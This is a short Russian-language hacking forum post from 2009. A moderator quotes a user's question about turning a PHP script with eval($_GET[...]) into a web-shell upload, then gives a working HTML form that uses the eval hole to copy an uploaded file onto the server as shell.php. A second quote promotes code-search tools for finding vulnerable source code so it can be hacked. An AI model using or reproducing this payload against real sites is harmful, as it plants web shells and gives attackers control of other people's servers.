29.11.2009, 10:37
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Nightmarе
Есть код:
<?php
eval($_GET[lol]);
?>
Как с помощью данного скрипта залить в папку TMP шелл используя только конструкцию $_FILE, без всяких url fopen и т.д...
Если где есть статейка с описанием способа, то покажите плз.
<form action="shell.php?lol=copy($_FILES[file][tmp_name], $_GET[bob]);&bob=./shell.php
" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="upload">
</form>
Сообщение от LzD
[Google Source Code: Поиск багов в исходниках.]
Представлены ссылки для поиска бажного кода.
[1]- GoogleCodeSearch
[2]- GoogleSearch
http://cipher.org.uk/ideas/bugle/
Юзаем , ищем баги, хекоем 
В этом проекте и наш ettee участвовал 
Последний раз редактировалось Ctacok; 29.11.2009 в 10:39..
|
|
|